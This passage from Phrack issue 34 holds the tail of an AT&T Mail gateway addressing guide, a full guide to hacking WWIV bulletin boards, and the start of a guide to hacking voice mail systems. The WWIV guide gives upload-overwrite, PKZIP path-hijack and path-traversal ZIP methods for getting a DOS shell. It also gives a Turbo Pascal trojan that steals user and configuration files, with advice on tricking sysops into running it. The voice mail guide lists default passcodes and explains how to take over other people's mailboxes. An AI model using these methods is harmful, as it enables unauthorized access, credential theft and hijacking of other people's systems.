  715.                           ||   December 19, 1990   ||
  716.                           ||                       ||
  717.                           ||    by Robert Alien    ||
  718.                           ||_______________________||
  719.  
  720. The Internet Gateway
  721. ~~~~~~~~~~~~~~~~~~~
  722. The Internet Gateway provides Internet e-mail users with a method of
  723. communication to AT&T Mail.  The Interconnect consists of various private
  724. email networks and uses an addressing format better know as Domain Addressing
  725. Service (DAS).
  726.  
  727. A domain address consists of a user name, followed by an @ sign and/or % sign
  728. and a domain name, which is usually the system name.
  729.  
  730. Example:
  731.  
  732.         jdoe@attmail.com
  733.  
  734. Sending Email to Internet Users
  735. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  736. To send email from the AT&T MailService to the Internet community use the UUCP
  737. addressing style.
  738.  
  739. Example:
  740.  
  741.         internet!system.domain!username
  742.  
  743. Translates to:
  744.  
  745.         internet!gnu.ai.mit.edu!jdoe
  746.  
  747. If you are sending e-mail to an Internet user whose e-mail address may be in
  748. the RFC 822 format (user@domain), you must translate the RFC address before
  749. sending your message to an Internet recipient.
  750.  
  751.         username@system.domain (Internet user's address)
  752.  
  753.         internet!system.domain!username (to a UUCP address)
  754.  
  755. Example:
  756.         username%system2@system.domain (Internet user's address)
  757.  
  758. Translates to:
  759.         internet!system.domain!system2!username
  760.  
  761. Sending Email From The Internet
  762. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  763. To send email to the AT&T Mail Service, Internet users can choose either the
  764. RFC 822 or UUCP addressing style.  The Internet recognizes attmail.com as the
  765. domain identifier for AT&T Mail when electronic messages are sent through the
  766. gateway.  Although many Internet users choose to send e-mail using the RFC 822
  767. addressing style, the UUCP style is also available on many UNIX systems on the
  768. Internet, but not every system supports UUCP.  Below are examples of both
  769. addressing styles:
  770.  
  771. RFC 822 Addressing: username@attmail.com
  772.  
  773. Example:
  774.  
  775.         jsmith@attmail.com
  776.  
  777. UUCP Addressing: attmail.com!username
  778.  
  779. Example:
  780.  
  781.         attmail.com!jdoe
  782.  
  783. Although email can be sent through the Internet gateway, surcharged services,
  784. such as Telex, FAX, COD, U.S. Mail, overnight, urgent mail and messages
  785. destined to other ADMDs connected to AT&T Mail are not deliverable.  If you are
  786. an Internet e-mail user attempting to use a surcharged service and are not
  787. registered on AT&T Mail, you will not be able to send your message, and will be
  788. automatically notified.  Below is a list of surcharged services that are
  789. unavailable to Internet users.
  790.  
  791. *  FAX
  792. *  Telex
  793. *  COD
  794. *  U.S. Mail
  795. *  Overnight
  796. *  Administrative Management Domain (ADMD) Messages
  797.  
  798. Sending Email to Bitnet Users
  799. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  800. To send email to BITNET users from AT&T Mail, enter:
  801.  
  802.         internet!host.bitnet!user
  803.  
  804. Sending Email to UUNET Users
  805. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  806. To send email to UUNET users from AT&T Mail via the Internet Gateway, enter:
  807.  
  808.         attmail!internet!uunet!system!user
  809.  
  810. Internet Restrictions
  811. ~~~~~~~~~~~~~~~~~~~~
  812. The following commercial restrictions apply to the use of the Internet Gateway.
  813.  
  814. *  Users are prohibited to use the Internet to carry traffic between commercial
  815.    (for profit) electronic messaging systems.
  816.  
  817. *  Advertising and soliciting i.e., messages offering goods or services for sale
  818.    or offers of jobs.
  819.  
  820. *  Provision of for-profit service, other than electronic messaging to Internet
  821.    users, is permitted (e.g., database services) if such service is used for
  822.    scholarly research purposes and its costs are borne by individual or
  823.    institutional subscription.
  824. _______________________________________________________________________________
  825.  
  826.  
  827.                                 ==Phrack Inc.==
  828.  
  829.                 Volume Three, Issue Thirty-four, File #5 of 11
  830.  
  831.                           ***                    ***
  832.                           ***                    ***
  833.                           *** The Complete Guide ***
  834.                           ***  to Hacking WWIV   ***
  835.                           ***                    ***
  836.                           ***     by Inhuman     ***
  837.                           ***   September 1991   ***
  838.                           ***                    ***
  839.                           ***                    ***
  840.  
  841.      WWIV is one of the most popular BBS programs in the country.  With
  842. thousands of boards in WWIVnet and hundreds in the spinoff WWIVlink, there is a
  843. lot of support and community.  The nice thing about WWIV is that it is very
  844. easy to set up.  This makes it popular among the younger crowd of sysops who
  845. can't comprehend the complexities of fossil drivers and batch files.  In this
  846. file, I will discuss four methods of hacking WWIV to achieve sysop access and
  847. steal the user and configuration files.  Just remember the number one rule
  848. of hacking: Don't destroy, alter, or create files on someone else's computer,
  849. unless it's to cover your own trail.  Believe me, there is nothing lower than
  850. the scum who hack BBSes for the sheer pleasure of formatting someone else's
  851. hard drive.  But there is nothing wrong (except legally) with hacking a system
  852. to look at the sysop's files, get phone numbers, accounts, etc.  Good luck.
  853.  
  854. ***
  855. *** Technique #1: The Wildcard Upload
  856. ***
  857.  
  858.      This technique will only work on a board running an unregistered
  859. old version of DSZ and a version of WWIV previous to v4.12.  It is all
  860. based on the fact that if you do a wildcard upload (*.*), whatever file you
  861. upload will go into the same directory as DSZ.COM, which is often the main BBS
  862. directory.  So there are several methods of hacking using this technique.
  863.  
  864.      If the sysop is running an unmodified version of WWIV, you can simply
  865. compile a modded version of it with a backdoor and overwrite his copy.  Your
  866. new copy will not be loaded into memory until the BBS either shrinks out (by
  867. running an onliner or something), or the sysop terminates the BBS and runs it
  868. again.
  869.  
  870.      You can also have some fun with two strings that WWIV always recognizes at
  871. the NN: prompt: "!@-NETWORK-@!" and "!@-REMOTE-@!".  The first is used by
  872. WWIVnet to tell the BBS that it is receiving a net call.  If the BBS is part of
  873. a network and you type "!@-NETWORK-@!", it will then wait for the network
  874. password and other data.  If the board is not part of a network, it will just
  875. act like you typed an invalid user name.  The second string is reserved for
  876. whatever programs people wanted to write for WWIV, like an off-line reader or
  877. whatever.  Snarf (the file leeching utility) uses this.  If there is not a
  878. REMOTE.EXE or REMOTE.COM in the main BBS directory, it will also act as if you
  879. entered an invalid user name.  So, what you can do is wildcard upload either
  880. REMOTE.COM or NETWORK.COM.  You want to call them COM files, because if the EXE
  881. files already exist, the COM ones will be called first.  If the BBS is part of
  882. a network, you should go for REMOTE.COM, because if you do NETWORK.COM, it will
  883. screw up network communications and the sysop will notice a lot faster.  Of
  884. course, if you're going straight in for the kill, it doesn't matter.
  885.  
  886.      So, what should NETWORK.COM or REMOTE.COM actually be? you ask.  Well, you
  887. can try renaming COMMAND.COM to one of those two, which would make a DOS shell
  888. for you when it was executed.  This is tricky, though, because you need to know
  889. his DOS version.  I suggest a batch file, compiled to a COM file using PC Mag's
  890. BAT2EXEC.  You can make the batch file have one line:
  891.  
  892. \COMMAND
  893.  
  894.      That way you don't have to worry about DOS versions.
  895.  
  896.      Remember that this method of hacking WWIV is almost completely obsolete.
  897. It is just included for reference, or for some old board run from an empty
  898. house where the sysop logs on twice a year or something.
  899.  
  900. ***
  901. *** Technique #2: The PKZIP Archive Hack
  902. ***
  903.  
  904.      Probably the most vulnerable part of WWIV is the archive section.  This
  905. section allows users to unZIP files to a temporary directory and ZIP the files
  906. you want into a temporary ZIP file, then download it.  This is useful if you
  907. download a file from another board, but one file in it is corrupted.  This way
  908. you don't have to re-download the whole file.  Anyway, on with the show.  Make
  909. a zip file that contains a file called PKZIP.BAT or COM or EXE.  It doesn't
  910. matter.  This file will be executed, so make it whatever you want, just like in
  911. Technique #1.  Make it COMMAND.COM, or a batch file, or a HD destroyer,
  912. whatever you want.  So you upload this file, and then type "E" to extract it.
  913.  
  914. It'll ask you what file to extract and you say the name of the file you just
  915. uploaded.  It'll then say "Extract What? " and you say "*.*".  It'll then unzip
  916. everything (your one file) into the TEMP directory.  Then go to the archive
  917. menu ("G") and pick "A" to add a file to archive.  It'll ask what file you want
  918. to add, and say anything, it doesn't matter.  At this point it will try to
  919. execute the command:
  920.  
  921. PKZIP TEMP.ZIP \TEMP\%1
  922.  
  923.      Where %1 is what you just entered.  The file pointer is already pointing
  924. to the temp directory, so instead of executing PKZIP from the DOS path, it'll
  925. execute the file sitting in the current directory, TEMP.  So then it runs PKZIP
  926. and you get your DOS shell or whatever.
  927.      If PKZIP does not work, you may want to try uploading another file, and
  928. use the same technique, but instead make it an ARC file and call the file in
  929. the archive PKPAK.
  930.  
  931.      This technique is relatively easy to defeat from the sysop's end, but
  932. often they are too lazy, or just haven't heard about it.
  933.  
  934. ***
  935. *** Technique #3: The -D Archive Hack
  936. ***
  937.  
  938.      This technique also plays on the openness of WWIV's archive system.  This
  939. is another method of getting a file into the root BBS directory, or anywhere on
  940. the hard drive, for that matter.
  941.  
  942.      First, create a temporary directory on your hard drive.  It doesn't matter
  943. what it's called.  We'll call it TEMP.  Then, make a sub-directory of TEMP
  944. called AA. It can actually be called any two-character combination, but we'll
  945. keep it nice and simple.  Then make a subdirectory of AA called WWIV.
  946.  
  947.      Place NETWORK.COM or REMOTE.COM or whatever in the directory
  948. \TEMP\AA\WWIV.  Then from the TEMP directory execute the command:
  949.  
  950. PKZIP -r -P STUFF.ZIP         <--- The case of "r" and "P" are important.
  951.  
  952.      This will create a zip file of all the contents of the directories, but
  953. with all of the directory names recursed and stored.  So if you do a PKZIP -V
  954. to list the files you should see AA\WWIV\REMOTE.COM, etc.
  955.  
  956.      Next, load STUFF.ZIP into a hex editor, like Norton Utilities, and search
  957. for "AA".  When you find it (it should occur twice), change it to "C:".  It is
  958. probably a good idea to do this twice, once with the subdirectory called WWIV,
  959. and another with it called BBS, since those are the two most common main BBS
  960. directory names for WWIV.  You may even want to try D: or E: in addition to C:.
  961. You could even work backwards, by forgetting the WWIV subdirectory, and just
  962. making it AA\REMOTE.COM, and changing the "AA" to "..".  This would be
  963. foolproof.  You could work from there, doing "..\..\DOS\PKZIP.COM" or whatever.
  964.  
  965.      Then upload STUFF.ZIP (or whatever you want to call it) to the BBS, and
  966. type "E" to extract it to a temporary directory.  It'll ask you what file.
  967. Type "STUFF.ZIP".  It'll ask what you want to extract.  Type """-D".  It'll
  968. then execute:
  969.  
  970. PKUNZIP STUFF.ZIP ""-D
  971.  
  972.      It will unzip everything into the proper directory.  Voila.  The quotation
  973. marks are ignored by PKUNZIP and are only there to trip up WWIV v4.20's check
  974. for the hyphen.  This method can only be defeated by modifying the source code,
  975. or taking out the calls to any PKZIP or PKUNZIP programs in INIT, but then you
  976. lose your archive section.
  977.  
  978.  
  979.  
  980. ***
  981. *** Technique #4: The Trojan Horse File-Stealer
  982. ***
  983.  
  984.      This method, if executed properly, is almost impossible to defeat, and
  985. will conceivably work on any BBS program, if you know the directory structure
  986. well enough.  Once again, you need PC Mag's BAT2EXEC, or enough programming
  987. experience to write a program that will copy files from one place to another.
  988.      The basic principle is this: You get the sysop to run a program that you
  989. upload.  This program copies \WWIV\DATA\USER.LST and \WWIV\CONFIG.DAT *over*
  990. files that already exist in the transfer or gfiles area.  You then go download
  991. those files and you have the two most important files that exist for WWIV.
  992. Now, you need to do a certain amount of guess-work here.  WWIV has it's
  993. directories set up like this:
  994.  
  995.  
  996.  
  997.        --- TEMP
  998.       I              --- DIR1
  999.       I             I
  1000.       I--- DLOADS---I--- DIR2
  1001.       I             I
  1002.       I              --- DIR3
  1003. WWIV--I--- DATA
  1004.       I              --- GDIR1
  1005.       I             I
  1006.       I--- GFILES---I--- GDIR2
  1007.       I             I
  1008.       I              --- GDIR3
  1009.        --- MSGS
  1010.  
  1011.  
  1012.      The sysop sets the names for the DIR1, DIR2, etc.  Often you have names
  1013. like UPLOADS, GAMES, UTILS, etc.  For the gfile dirs you might have GENERAL,
  1014. HUMOR, whatever.
  1015.  
  1016.      So you have to make a guess at the sysop's directory names.  Let's say he
  1017. never moves his files from the upload directory.  Then do a directory list from
  1018. the transfer menu and pick two files that you don't think anyone will download.
  1019. Let's say you see:
  1020.  
  1021. RABBIT  .ZIP 164k : The History of Rabbits from Europe to the U.S.
  1022. SCD     .COM  12k : SuperCD - changes dirs 3% faster than DOS's CD!
  1023.  
  1024.      So you then might write a batch file like this:
  1025.  
  1026. @ECHO OFF
  1027. COPY \WWIV\DATA\USER.LST \WWIV\DLOADS\UPLOADS\RABBIT.ZIP
  1028. COPY \BBS\DATA\USER.LST \BBS\DLOADS\UPLOADS\RABBIT.ZIP
  1029. COPY \WWIV\CONFIG.DAT \WWIV\DLOADS\UPLOADS\SCD.COM
  1030. COPY \BBS\CONFIG.DAT \BBS\DLOADS\UPLOADS\SCD.COM
  1031.  
  1032.      You'd then compile it to a COM file and upload it to the sysop directory.
  1033. Obviously this file is going to be pretty small, so you have to make up
  1034. plausible use for it.  You could say it's an ANSI screen for your private BBS,
  1035. and the sysop is invited.  This is good if you have a fake account as the
  1036. president of some big cracking group.  You wouldn't believe how gullible some
  1037. sysops are.  At any rate, use your imagination to get him to run the file.  And
  1038. make it sound like he shouldn't distribute it, so he won't put it in some
  1039. public access directory.
  1040.  
  1041.      There is a problem with simply using a batch file.  The output will look
  1042. like:
  1043.  
  1044. 1 file(s) copied.
  1045. File not found.
  1046. 1 file(s) copied.
  1047. File not found.
  1048.  
  1049.      That might get him curious enough to look at it with a hex editor, which
  1050. would probably blow everything.  That's why it's better to write a program in
  1051. your favorite language to do this.  Here is a program that searches specified
  1052. drives and directories for CONFIG.DAT and USER.LST and copies them over the
  1053. files of your choice.  It was written in Turbo Pascal v5.5:
  1054.  
  1055. Program CopyThisOverThat;
  1056.  
  1057. { Change the dir names to whatever you want.  If you change the number of
  1058.   locations it checks, be sure to change the "num" constants as well  }
  1059.  
  1060. uses dos;
  1061.  
  1062. const
  1063.    NumMainDirs = 5;
  1064.    MainDirs: array[1..NumMainDirs] of string[8] = ('BBS','WWIV','WORLD',
  1065.       'BOARD','WAR');
  1066.    NumGfDirs = 3;
  1067.    GFDirs: array[1..NumGFDirs] of string[8] = ('DLOADS','FILES','UPLOADS');
  1068.    NumSubGFDirs = 2;
  1069.    SubGFDirs: array[1..NumSubGFDirs] of string[8] = ('UPLOADS','MISC');
  1070.  
  1071.    NumDirsToTest = 3;
  1072.    DirsToTest: array[1..NumDirsToTest] of string[3] = ('C:\','D:\','E:\');
  1073.    {ok to test for one that doesn't exist}
  1074.  
  1075.    {Source file names include paths from the MAIN BBS subdir (e.g. "BBS")  }
  1076.  
  1077.    SourceFileNames: array[1..2] of string[25] = ('DATA\USER.LST','DATA\CONFIG.DA
  1078. T');
  1079.  
  1080.    { Dest file names are from subgfdirs }
  1081.  
  1082.    DestFileNames: array[1..2] of string[12] = ('\BDAY.MOD','\TVK.ZIP');
  1083.  
  1084. var
  1085.    p, q, r, x, y, dirN: byte;
  1086.    bigs: word;
  1087.    CurDir, BackDir: string[80];
  1088.    f1, f2: file;
  1089.    Info: pointer;
  1090.    ok: boolean;
  1091.  
  1092. Procedure Sorry;
  1093.  
  1094. var
  1095.    x, y: integer;
  1096. begin
  1097. for y := 1 to 1000 do
  1098.    for x := 1 to 100 do
  1099.       ;
  1100. Writeln;
  1101. Writeln ('<THIS IS DISPLAYED WHEN FINISHED>');  {change to something like }
  1102. Writeln;                                        {Abnormal program termination}
  1103. ChDir(BackDir);
  1104. Halt;
  1105. end;
  1106.  
  1107. begin
  1108.  
  1109. Write ('<THIS IS DISPLAYED WHILE SEARCHING>'); {change to something like }
  1110.  
  1111. {$I-}                                          {Loading...}
  1112.  
  1113. GetDir (0, BackDir);
  1114. ChDir('\');
  1115. for dirn := 1 to NumDirsToTest do
  1116.    begin
  1117.    ChDir(DirsToTest[dirn]);
  1118.    if IOResult = 0 then
  1119.       begin
  1120.       for p := 1 to NumMainDirs do
  1121.          begin
  1122.          ChDir (MainDirs[p]);
  1123.          if (IOResult <> 0) then
  1124.             begin
  1125.             if (p = NumMainDirs) and (dirn = NumDirsToTest) then
  1126.                Sorry;
  1127.             end else begin
  1128.             p := NumMainDirs;
  1129.             for q := 1 to NumGFDirs do
  1130.                begin
  1131.                ChDir (GFDirs[q]);
  1132.                if (IOResult <> 0) then
  1133.                   begin
  1134.                   if (q = NumGFDirs) and (dirn=NumdirsToTest) then
  1135.                      Sorry;
  1136.                   end else begin
  1137.                   q := NumGFDirs;
  1138.                   for r := 1 to NumSubGFDirs do
  1139.                      begin
  1140.                      ChDir (SubGFDirs[r]);
  1141.                      if (IOResult <> 0) then
  1142.                         begin
  1143.                         if r = NumSubGFDirs then
  1144.                            Sorry;
  1145.                         end else begin
  1146.                         r := NumSubGFDirs;
  1147.                         dirn := NumDirsToTest;
  1148.                         ok := true;
  1149.                         end;
  1150.                      end;
  1151.                   end;
  1152.                end;
  1153.             end;
  1154.          end;
  1155.       end;
  1156.    end;
  1157. GetDir (0, CurDir);
  1158. ChDir ('..');
  1159. ChDir ('..');
  1160. for x := 1 to 2 do
  1161.    begin
  1162.    Assign (f1, SourceFileNames[x]);
  1163.    Assign (f2, CurDir+DestFileNames[x]);
  1164.    Reset (f1, 1);
  1165.    if IOResult <> 0 then
  1166.       begin
  1167.       if x = 2 then
  1168.          Sorry;
  1169.       end else begin
  1170.       ReWrite (f2, 1);
  1171.       Bigs := FileSize(f1);
  1172.       GetMem(Info, Bigs);
  1173.       BlockRead(f1, Info^, Bigs);
  1174.       BlockWrite (f2, Info^, Bigs);
  1175.       FreeMem(Info, Bigs);
  1176.       end;
  1177.    end;
  1178. Sorry;
  1179. end.
  1180.  
  1181.      So hopefully the sysop runs this program and emails you with something
  1182. like "Hey it didn't work bozo!".  Or you could make it work.  You could
  1183. actually stick a BBS ad in the program or whatever.  It's up to you.  At any
  1184. rate, now you go download those files that it copied the USER.LST and
  1185. CONFIG.DAT over.  You can type out the CONFIG.DAT and the first word you see in
  1186. all caps is the system password.  There are several utilities for WWIV that let
  1187. you compile the USER.LST to a text file.  You can find something like that on a
  1188. big WWIV board, or you can try to figure it out with a text or hex editor.  At
  1189. any rate, once you have those two files, you're in good shape.
  1190.  
  1191.      You could also use a batch file like that in place of one that calls
  1192. COMMAND.COM for something like REMOTE.COM.  It's up to you.
  1193.  
  1194. ***
  1195. *** Hacking Prevention
  1196. ***
  1197.  
  1198.      So you are the sysop of a WWIV board, and are reading this file with
  1199. growing dismay.  Have no fear, if you have patience, almost all of these
  1200. methods can be fixed.
  1201.  
  1202.      To eliminate the wildcard upload, all you have to do it get a current copy
  1203. of WWIV (4.20), and the latest version of DSZ.  It's all been fixed.  To fix
  1204. the PKZIP archive hack, simply specify a path in INIT in all calls to PKZIP,
  1205. PKUNZIP, PKPAK, PKUNPAK, and any other archive programs you have.  So your
  1206. command lines should look like:
  1207.  
  1208. \DOS\PKZIP -V %1
  1209.  
  1210.      Or something similar.  That will fix that nicely.  To eliminate the -D
  1211. method, you have to make some modifications to the source code if you want to
  1212. keep your archive section.  Goose, sysop of the Twilight Zone BBS in VA,
  1213. puts out a NOHACK mod, which is updated regularly.  It fixes ALL of these
  1214. methods except the last.  The latest version of NOHACK is v2.4.  If you are a
  1215. WWIV sysop, put it in.
  1216.  
  1217.      I can think of two ways to stop the last method, but neither of them are
  1218. easy, and both require source code modifications.  You could keep track of the
  1219. filesize of a file when it's uploaded.  Then when someone goes to download it,
  1220. you could check the actual filesize with the size when it was uploaded.  If
  1221. they differ, it wouldn't let you download it.  You could do the same with the
  1222. date.  Although either method could be gotten around with enough patience.
  1223.  
  1224.      For a virtually unhackable system, voice validate all users, have all
  1225. uploads go to the sysop directory so you can look over them first, and don't
  1226. run any programs.  Of course, this is very tedious, but that is the price
  1227. of a secure BBS.
  1228.  
  1229. ***
  1230. *** Thanks
  1231. ***
  1232.  
  1233.      Thanks to Fenris Wolf for teaching me about the -D method, to Steve
  1234. for help with the CopyThisOverThat program, and to Insight for proofing this
  1235. file.
  1236.  
  1237. *******************************************************************************
  1238.  
  1239.                                 ==Phrack Inc.==
  1240.  
  1241.                 Volume Three, Issue Thirty-four, File #6 of 11
  1242.  
  1243.  
  1244.                            HACKING VOICE MAIL SYSTEMS
  1245.  
  1246.                                by  Night Ranger
  1247.  
  1248.  
  1249. DISCLAIMER
  1250.  
  1251. I, Night Ranger, or anyone else associated with Phrack, am not responsible
  1252. for anything the readers of this text may do.  This file is for informational
  1253. and educational purposes only and should not be used on any system or network
  1254. without written permission of the authorized persons in charge.
  1255.  
  1256.  
  1257. INTRODUCTION
  1258.  
  1259. I decided to write this text file because I received numerous requests for
  1260. vmbs from people.  Vmbs are quite easy to hack, but if one doesn't know where
  1261. to start it can be hard.  Since there aren't any decent text files on this
  1262. subject, I couldn't refer them to read anything, and decided to write one
  1263. myself.  To the best of my knowledge, this is the most complete text on
  1264. hacking vmb systems.  If you have any comments or suggestions, please let me
  1265. know.
  1266.  
  1267. Voice Mail Boxes (vmbs) have become a very popular way for hackers to get in
  1268. touch with each other and share information.  Probably the main reason for
  1269. this is their simplicity and availability.  Anyone can call a vmb regardless
  1270. of their location or computer type.  Vmbs are easily accessible because most
  1271. are toll free numbers, unlike bulletin boards.  Along with their advantages,
  1272. they do have their disadvantages.  Since they are easily accessible this
  1273. means not only hackers and phreaks can get information from them, but feds
  1274. and narcs as well.  Often they do not last longer than a week when taken
  1275. improperly.  After reading this file and practicing the methods described,
  1276. you should be able to hack voice mail systems with ease.  With these thoughts
  1277. in mind, let's get started.
  1278.  
  1279.  
  1280. FINDING A VMB SYSTEM
  1281.  
  1282. The first thing you need to do is find a VIRGIN (unhacked) vmb system.  If
  1283. you hack on a system that already has hackers on it, your chance of finding
  1284. a box is considerably less and it increases the chance that the system
  1285. administrator will find the hacked boxes.  To find a virgin system, you need
  1286. to SCAN some 800 numbers until you find a vmb.  A good idea is to take the
  1287. number of a voice mail system you know, and scan the same exchange but not
  1288. close to the number you have.
  1289.  
  1290.  
  1291. FINDING VALID BOXES ON THE SYSTEM
  1292.  
  1293. If you get a high quality recording (not an answering machine) then it is
  1294. probably a vmb system.  Try entering the number 100, the recording should
  1295. stop.  If it does not, you may have to enter a special key (such as '*' '#'
  1296. '8' or '9') to enter the voice mail system.  After entering 100 it should
  1297. either connect you to something or do nothing.  If it does nothing, keep
  1298. entering (0)'s until it does something.  Count the number of digits you
  1299. entered and this will tell you how many digits the boxes on the system are.
  1300. You should note that many systems can have more than one box length depending
  1301. on the first number you enter, Eg. Boxes starting with a six can be five
  1302. digits while boxes starting with a seven can only be four.  For this file we
  1303. will assume you have found a four digit system, which is pretty common.  It
  1304. should do one of the following things...
  1305.  
  1306. 1)  Give you an error message, Eg. 'Mailbox xxxx is invalid.'
  1307. 2)  Ring the extension and then one of the following..
  1308.     1)  Someone or no one answers.
  1309.     2)  Connects you to a box.
  1310. 3)  Connect you to mailbox xxxx.
  1311.  
  1312. If you get #1 then try some more numbers.  If you get #2 or #3 then you have
  1313. found a valid vmb (or extension in the case of 2-1).  Extensions usually have
  1314. a vmb for when they are not at their extension.  If you get an extension,
  1315. move on.  Where you find one box you will probably find more surrounding it.
  1316. Sometimes a system will try to be sneaky and put one valid vmb per 10 numbers.
  1317. Eg. Boxes would be at 105, 116, 121, ... with none in between.  Some systems
  1318. start boxes at either 10 after a round number or 100 after, depending on
  1319. whether it is a three or four box system.  For example, if you do not find
  1320. any around 100, try 110 and if you do not find any around 1000 try 1100.  The
  1321. only way to be sure is to try EVERY possible box number.  This takes time but
  1322. can be worth it.
  1323.  
  1324. Once you find a valid box (even if you do not know the passcode) there is a
  1325. simple trick to use when scanning for boxes outside of a vmb so that it does
  1326. not disconnect you after three invalid attempts.  What you do is try two box
  1327. numbers and then the third time enter a box number you know is valid.  Then
  1328. abort ( usually by pressing (*) or (#) ) and it will start over again.  From
  1329. there you can keep repeating this until you find a box you can hack on.
  1330.  
  1331.  
  1332. FINDING THE LOGIN SEQUENCE
  1333.  
  1334. Different vmb systems have different login sequences (the way the vmb owner
  1335. gets into his box).  The most common way is to hit the pound (#) key from the
  1336. main menu.  This pound method works on most systems, including Aspens (more
  1337. on specific systems later).  It should respond with something like 'Enter
  1338. your mailbox.' and then 'Enter your passcode.'  Some systems have the
  1339. asterisk (*) key perform this function.  Another login method is hitting a
  1340. special key during the greeting (opening message) of the vmb.  On a Cindy or
  1341. Q Voice Mail system you hit the zero (0) key during the greet and since
  1342. you've already entered your mailbox number it will respond with 'Enter your
  1343. passcode.'  If (0) doesn't do anything try (#) or (*).  These previous two
  1344. methods of login are the most common, but it is possible some systems will
  1345. not respond to these commands.  If this should happen, keep playing around
  1346. with it and trying different keys.   If for some reason you cannot find the
  1347. login sequence, then save this system for later and move on.
  1348.  
  1349.  
  1350. GETTING IN
  1351.  
  1352. This is where the basic hacking skills come to use.  When a system
  1353. administrator creates a box for someone, they use what's called a default
  1354. passcode.  This same code is used for all the new boxes on the system, and
  1355. often on other systems too.  Once the legitimate owner logs into his new vmb,
  1356. they are usually prompted to change the passcode, but not everyone realizes
  1357. that someone will be trying to get into their mailbox and quite a few people
  1358. leave their box with the default passcode or no passcode at all.  You should
  1359. try ALL the defaults I have listed first.
  1360.  
  1361.  
  1362. DEFAULTS           BOX NUMBER      TRY
  1363.  
  1364. box number (bn)    3234            3234        Most Popular
  1365. bn backwards       2351            1532        Popular
  1366. bn+'0'             323             3230        Popular With Aspens
  1367.  
  1368. Some additional defaults in order of most to least common are:
  1369.  
  1370. 4d        5d        6d
  1371. 0000      00000     000000    *MOST POPULAR*
  1372. 9999      99999     999999    *POPULAR*
  1373. 1111      11111     111111    *POPULAR*
  1374. 1234      12345     123456    *VERY POPULAR WITH OWNERS*
  1375. 4321      54321     654321
  1376. 6789      56789     456789
  1377. 9876      98765     987654
  1378. 2222      22222     222222
  1379. 3333      33333     333333
  1380. 4444      44444     444444
  1381. 5555      55555     555555
  1382. 6666      66666     666666
  1383. 7777      77777     777777
  1384. 8888      88888     888888
  1385. 1991
  1386.  
  1387.  
  1388. It is important to try ALL of these before giving up on a system.  If none of
  1389. these defaults work, try anything you think may be their passcode.  Also
  1390. remember that just because the system can have a four digit passcode the vmb
  1391. owner does not have to have use all four digits.  If you still cannot get
  1392. into the box, either the box owner has a good passcode or the system uses a
  1393. different default.  In either case, move on to another box.  If you seem to
  1394. be having no luck, then come back to this system later.  There are so many
  1395. vmb systems you should not spend too much time on one hard system.
  1396.  
  1397. If there's one thing I hate, it's a text file that says 'Hack into the
  1398. system.  Once you get in...' but unlike computer systems, vmb systems really
  1399. are easy to get into.  If you didn't get in, don't give up!  Try another
  1400. system and soon you will be in.  I would say that 90% of all voice mail
  1401. systems have a default listed above.  All you have to do is find a box with
  1402. one of the defaults.
  1403.  
  1404.  
  1405. ONCE YOU'RE IN
  1406.  
  1407. The first thing you should do is listen to the messages in the box, if there
  1408. are any.  Take note of the dates the messages were left.  If they are more
  1409. than four weeks old, then it is pretty safe to assume the owner is not using
  1410. his box.  If there are any recent messages on it, you can assume he is
  1411. currently using his box.  NEVER take a box in use.  It will be deleted soon,
  1412. and will alert the system administrator that people are hacking the system.
  1413. This is the main reason vmb systems either go down, or tighten security.  If
  1414. you take a box that is not being used, it's probable no one will notice for
  1415. quite a while.
  1416.  
  1417.  
  1418. SCANNING BOXES FROM THE INSIDE
  1419.  
  1420. >From the main menu, see if there is an option to either send a message to
  1421. another user or check receipt of a message.  If there is you can search for
  1422. VIRGIN (unused) boxes) without being disconnected like you would from
  1423. outside of a box.  Virgin boxes have a 'generic' greeting and name.  Eg.
  1424. 'Mailbox xxx' or 'Please leave your message for mailbox xxx...'   Write down
  1425. any boxes you find with a generic greeting or name, because they will
  1426. probably have the default passcode.  Another sign of a virgin box is a name
  1427. or greeting like 'This mailbox is for ...' or a women's voice saying a man's
  1428. name and vice versa, which is the system administrator's voice.  If the box
  1429. does not have this feature, simply use the previous method of scanning boxes
  1430. from the outside.  For an example of interior scanning, when inside an Aspen
  1431. box, chose (3) from the main menu to check for receipt.  It will respond with
  1432. 'Enter box number.'  It is a good idea to start at a location you know there
  1433. are boxes present and scan consecutively, noting any boxes with a 'generic'
  1434. greeting.  If you enter an invalid box it will alert you and allow you to
  1435. enter another.  You can enter invalid box numbers forever, instead of the
  1436. usual three incorrect attempts from outside a box.
  1437.  
  1438.  
  1439. TAKING A BOX
  1440.  
  1441. Now you need to find a box you can take over.  NEVER take a box in use; it
  1442. simply won't last.  Deserted boxes (with messages from months ago) are the
  1443. best and last the longest.  Take these first.  New boxes have a chance of
  1444. lasting, but if the person for whom the box was created tries to login,
  1445. you'll probably lose it.  If you find a box with the system administrator's
  1446. voice saying either the greeting or name (quite common), keeping it that way
  1447. will prolong the box life, especially the name.
  1448.  
  1449. This is the most important step in taking over a box!  Once you pick a box take
  1450.  over, watch it for at least three days BEFORE changing anything!  Once
  1451. you think it's not in use, then change only the passcode, nothing else!
  1452. Then login frequently for two to three days to monitor the box and make sure
  1453. no one is leaving messages in it.  Once you are pretty sure it is deserted,
  1454. change your greeting to something like 'Sorry I'm not in right now, please
  1455. leave your name and number and I'll get back to you.'  DO NOT say 'This is
  1456. Night Ranger dudes...' because if someone hears that it's good as gone.  Keep
  1457. your generic greeting for one week.  After that week, if there are no
  1458. messages from legitimate people, you can make your greeting say whatever you
  1459. want.  The whole process of getting a good vmb (that will last) takes about
  1460. 7-10 days, the more time you take the better chance you have of keeping it
  1461. for long time.  If you take it over as soon as you get in, it'll probably
  1462. last you less than a week.  If you follow these instructions, chances are it
  1463. will last for months.  When you take some boxes, do not take too many at one
  1464. time.  You may need some to scan from later.  Plus listening to the messages
  1465. of the legitimate users can supply you with needed information, such as the
  1466. company's name, type of company, security measures, etc.
  1467.  
  1468.  
  1469. SYSTEM IDENTIFICATION
  1470.  
  1471. After you have become familiar with various systems, you will recognize them
  1472. by their characteristic female (or male) voice and will know what defaults
  1473. are most common and what tricks you can use.  The following is a few of a few
  1474. popular vmb systems.
  1475.  
  1476. ASPEN is one of the best vmb systems with the most features.  Many of them
  1477. will allow you to have two greetings (a regular and an extended absence
  1478. greeting), guest accounts, urgent or regular messages, and numerous other
  1479. features.  Aspens are easy to recognize because the female voice is very
